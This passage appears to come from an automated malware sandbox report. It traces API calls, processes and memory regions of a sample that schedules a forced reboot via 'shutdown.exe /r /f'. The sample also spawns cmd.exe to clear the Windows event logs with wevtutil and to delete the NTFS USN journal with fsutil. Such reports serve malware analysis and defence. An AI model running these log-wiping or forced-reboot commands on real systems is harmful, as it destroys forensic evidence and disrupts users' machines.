(lpStart=" ", wMatch=0x79) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x33) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x32) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x68) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x75) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0039.266] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0039.266] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0039.266] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0039.266] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0039.266] StrChrIW (lpStart="C:\\Windows\\system32\\shutdown.exe /r /f", wMatch=0x20) returned=" /r /f" [0039.266] lstrlenW (lpString="/r /f") returned 5 [0039.266] lstrlenW (lpString=" ") returned 1 [0039.267] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0039.267] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0039.267] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0039.267] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0039.267] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0039.267] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0039.267] IUnknown:Release (This=0x2c2580) returned 0x1 [0039.267] IUnknown:Release (This=0x2c3e58) returned 0x1 [0039.267] ITaskDefinition:get_Triggers (in: This=0x2c3de0, ppTriggers=0x18cc08 | out: ppTriggers=0x18cc08*=0x2c3f10) returned 0x0 [0039.267] SystemTimeToFileTime (in: lpSystemTime=0x18d064, lpFileTime=0x18cc0c | out: lpFileTime=0x18cc0c) returned 1 [0039.267] SystemTimeToFileTime (in: lpSystemTime=0x18d0a8, lpFileTime=0x18cbfc | out: lpFileTime=0x18cbfc) returned 1 [0039.267] CompareFileTime (lpFileTime1=0x18cc0c, lpFileTime2=0x18cbfc) returned -1 [0039.267] ITriggerCollection:Create (in: This=0x2c3f10, Type=1, ppTrigger=0x18cc14 | out: ppTrigger=0x18cc14*=0x2c25c0) returned 0x0 [0039.268] _vsnwprintf (in: _Buffer=0x18cb78, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x18cb60 | out: _Buffer="2017-06-30T17:15:00") returned 19 [0039.268] ITrigger:put_StartBoundary (This=0x2c25c0, StartBoundary="2017-06-30T17:15:00") returned 0x0 [0039.268] lstrlenW (lpString="") returned 0 [0039.268] lstrlenW (lpString="") returned 0 [0039.268] lstrlenW (lpString="") returned 0 [0039.268] lstrlenW (lpString="") returned 0 [0039.268] IUnknown:Release (This=0x2c25c0) returned 0x1 [0039.268] IUnknown:Release (This=0x2c3f10) returned 0x1 [0039.268] ITaskDefinition:get_Settings (in: This=0x2c3de0, ppSettings=0x18d024 | out: ppSettings=0x18d024*=0x2c3f50) returned 0x0 [0039.269] lstrlenW (lpString="") returned 0 [0039.269] IUnknown:Release (This=0x2c3f50) returned 0x1 [0039.269] GetLocalTime (in: lpSystemTime=0x18cf14 | out: lpSystemTime=0x18cf14*(wYear=0x7e1, wMonth=0x6, wDayOfWeek=0x5, wDay=0x1e, wHour=0x11, wMinute=0x2, wSecond=0xc, wMilliseconds=0x26b)) [0039.269] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x75f60000 [0039.269] GetProcAddress (hModule=0x75f60000, lpProcName="GetUserNameW") returned 0x75f7157a [0039.269] GetUserNameW (in: lpBuffer=0x18cf28, pcbBuffer=0x18cf10 | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0x18cf10) returned 1 [0039.270] ITaskDefinition:get_RegistrationInfo (in: This=0x2c3de0, ppRegistrationInfo=0x18cf24 | out: ppRegistrationInfo=0x18cf24*=0x2c3ea0) returned 0x0 [0039.270] IRegistrationInfo:put_Author (This=0x2c3ea0, Author="hJrD1KOKY DS8lUjv") returned 0x0 [0039.270] _vsnwprintf (in: _Buffer=0x18cf28, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x18cee8 | out: _Buffer="2017-06-30T17:02:12") returned 19 [0039.271] IRegistrationInfo:put_Date (This=0x2c3ea0, Date="2017-06-30T17:02:12") returned 0x0 [0039.271] IUnknown:Release (This=0x2c3ea0) returned 0x1 [0039.272] lstrlenW (lpString="") returned 0 [0039.272] ITaskFolder:RegisterTaskDefinition (in: This=0x2c3d80, Path="", pDefinition=0x2c3de0, flags=2, UserId=0x18d00c*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x18d01c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x18d030*(varType=0x0, wReserved1=0x0, wReserved2=0xccb8, wReserved3=0x18, varVal1=0x0, varVal2=0x0), ppTask=0x18d0bc | out: ppTask=0x18d0bc*=0x2c2f18) returned 0x0 [0039.702] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0039.702] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0039.702] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0039.702] _vsnwprintf (in: _Buffer=0x18d4d4, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x18d040 | out: _Buffer="SUCCESS: The scheduled task \"\" has successfully been created.\n") returned 62 [0039.702] _fileno (_File=0x769e2920) returned 1 [0039.702] _errno () returned 0x2c07d8 [0039.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.702] _errno () returned 0x2c07d8 [0039.702] GetFileType (hFile=0x7) returned 0x2 [0039.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.703] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18d004 | out: lpMode=0x18d004) returned 1 [0039.703] __iob_func () returned 0x769e2900 [0039.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.703] lstrlenW (lpString="SUCCESS: The scheduled task \"\" has successfully been created.\n") returned 62 [0039.703] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x18d4d4*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x18d02c, lpReserved=0x0 | out: lpBuffer=0x18d4d4*, lpNumberOfCharsWritten=0x18d02c*=0x3e) returned 1 [0039.704] IUnknown:Release (This=0x2c2f18) returned 0x0 [0039.704] IUnknown:Release (This=0x2c3de0) returned 0x0 [0039.704] IUnknown:Release (This=0x2c3d80) returned 0x0 [0039.704] TaskScheduler:IUnknown:Release (This=0x2c3d18) returned 0x1 [0039.704] lstrlenW (lpString="") returned 0 [0039.712] exit (_Code=0) Thread: id = 11 os_tid = 0x9a4 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x9fd6000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "4" os_parent_pid = "0x99c" cmd_line = "taskeng.exe {0D1FD9A9-3A1B-4884-B8AD-2AF772DB274D} S-1-5-21-1463843789-3877896393-3178144628-1000:1R6PFH\\hJrD1KOKY DS8lUjv:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 491 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 492 start_va = 0x20000 end_va = 0x20fff entry_point = 0x20000 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 493 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 494 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 495 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 496 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 497 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 498 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 499 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 500 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 501 start_va = 0x230000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 502 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 503 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 504 start_va = 0x530000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 505 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 506 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 507 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 508 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 509 start_va = 0x1cf0000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 510 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 511 start_va = 0x1e40000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 512 start_va = 0x1ec0000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 513 start_va = 0x1fc0000 end_va = 0x228efff entry_point = 0x1fc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 514 start_va = 0x2290000 end_va = 0x236efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 515 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 516 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x76ec5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 517 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x76fea2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 518 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 519 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 520 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 521 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 522 start_va = 0xffc80000 end_va = 0xffcf3fff entry_point = 0xffc8f44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 523 start_va = 0x7fef9070000 end_va = 0x7fef9078fff entry_point = 0x7fef90711a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 524 start_va = 0x7fef9ed0000 end_va = 0x7fef9ed9fff entry_point = 0x7fef9ed260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 525 start_va = 0x7fefb500000 end_va = 0x7fefb534fff entry_point = 0x7fefb501064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 526 start_va = 0x7fefb540000 end_va = 0x7fefb557fff entry_point = 0x7fefb541130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 527 start_va = 0x7fefb970000 end_va = 0x7fefb9c5fff entry_point = 0x7fefb97bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 528 start_va = 0x7fefc610000 end_va = 0x7fefc656fff entry_point = 0x7fefc611064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 529 start_va = 0x7fefc910000 end_va = 0x7fefc926fff entry_point = 0x7fefc9132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 530 start_va = 0x7fefcb40000 end_va = 0x7fefcbacfff entry_point = 0x7fefcb41010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 531 start_va = 0x7fefcee0000 end_va = 0x7fefcf04fff entry_point = 0x7fefcee9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 532 start_va = 0x7fefcf10000 end_va = 0x7fefcf1efff entry_point = 0x7fefcf11010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 533 start_va = 0x7fefd000000 end_va = 0x7fefd013fff entry_point = 0x7fefd0010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 534 start_va = 0x7fefd260000 end_va = 0x7fefd2cafff entry_point = 0x7fefd2630e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 535 start_va = 0x7fefd3f0000 end_va = 0x7fefd4c6fff entry_point = 0x7fefd3f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 536 start_va = 0x7fefd650000 end_va = 0x7fefd77cfff entry_point = 0x7fefd69ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 537 start_va = 0x7fefd910000 end_va = 0x7fefda18fff entry_point = 0x7fefd911064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 538 start_va = 0x7fefdd00000 end_va = 0x7fefdd70fff entry_point = 0x7fefdd11e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 539 start_va = 0x7fefdd90000 end_va = 0x7fefddaefff entry_point = 0x7fefdd960e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 540 start_va = 0x7fefddb0000 end_va = 0x7fefde16fff entry_point = 0x7fefddbb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 541 start_va = 0x7fefde20000 end_va = 0x7fefdefafff entry_point = 0x7fefde40760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 542 start_va = 0x7fefdf50000 end_va = 0x7fefdfeefff entry_point = 0x7fefdf525a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 543 start_va = 0x7fefdff0000 end_va = 0x7fefe088fff entry_point = 0x7fefdff1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 544 start_va = 0x7fefe090000 end_va = 0x7fefe158fff entry_point = 0x7fefe10a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 545 start_va = 0x7fefe160000 end_va = 0x7fefe18dfff entry_point = 0x7fefe161010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 546 start_va = 0x7fefe230000 end_va = 0x7fefe23dfff entry_point = 0x7fefe231080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 547 start_va = 0x7feff1d0000 end_va = 0x7feff3d2fff entry_point = 0x7feff1f3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 548 start_va = 0x7feff3f0000 end_va = 0x7feff3f0fff entry_point = 0x7feff3f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 549 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 550 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 551 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 552 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 553 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 554 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 555 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 556 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 12 os_tid = 0x5a4 Thread: id = 13 os_tid = 0x5a0 Thread: id = 14 os_tid = 0x598 Thread: id = 15 os_tid = 0x580 Thread: id = 16 os_tid = 0x570 Thread: id = 17 os_tid = 0x568 Thread: id = 34 os_tid = 0xa9c Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x14882000" os_pid = "0x9d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x948" cmd_line = "/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 557 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 558 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 559 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 560 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 561 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 562 start_va = 0x100000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 563 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 564 start_va = 0x4a080000 end_va = 0x4a0cbfff entry_point = 0x4a08829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 565 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 566 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 567 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 568 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 569 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 570 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 571 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 572 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 573 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 574 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 575 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 576 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 577 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 578 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 579 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 580 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 581 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 582 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 583 start_va = 0x74a20000 end_va = 0x74a26fff entry_point = 0x74a21230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 584 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 585 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 586 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 587 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 588 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 589 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 590 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 591 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 592 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename 